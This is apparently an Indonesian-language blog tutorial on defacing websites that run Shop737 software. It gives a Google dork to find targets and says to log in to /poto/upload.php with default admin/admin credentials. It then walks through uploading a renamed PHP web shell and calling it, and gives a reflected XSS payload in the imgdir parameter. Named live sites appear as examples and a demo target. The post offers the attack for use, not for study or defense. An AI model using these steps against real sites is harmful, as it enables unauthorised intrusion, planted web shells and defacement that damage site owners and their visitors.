Shop737 XSS & Upload Shell Vulnerability

LinuXploit Security - Halo Exploiter. kali ini saya akan membagikan tutorial deface metode/PoC Shop737 Upload Shell & XSS Vulnerability. ok tutornya kita bagi dua, yang pertama kita Mulai tutorial shop737 upload shell vulnerability.
ini exploit udh lama sih, tpi banyak dri kalian yg minta dibuatin tutor deface exploit2 lama.

#Google Dork :
- intext:"Powered By Shop737" ( Kembangkan Lagi Soalnya Targetnya Udh dikit )
#Exploit : /poto/upload.php

1. Kalian cari target dlu dengan dork diatas, kemudian masukkan exploitnya target.com/poto/upload.php
jika dimintain user&pass masukkan saja admin & admin

2. jika vuln maka akan masuk ke halaman upload gambar
seperti ini :

pilih kategori lalu telurusi file shell php yang direname tadi
lalu klik upload hingga ada tulisan seperti sukses :)

lihat gambar :

sejarang kita panggil shellnya :)
www.site.com/namakategori/shell.php.xxxjpg

*contoh : cctv-surabaya.com/poto/-/shell.php.xxxjpg
lihat gambar :
                              

jangan lupa , masukkan passwordnya :D
Doorr ..



XSS Vulnerability

1. dorking menggunakan dork diatas tadi.

2. letak vulnerability : /poto/index.php?imgdir=
contoh : target.com/poto/index.php?imgdir="><marquee>Tested By LinuXploit</marquee>

3. Demo Site : http://www.kaligane.com/poto/index.php?imgdir=


Ok Sekian Dari Saya
Terimakasih Sudah Mampir.
Learn LinuXploit
LihatTutupKomentar
loading...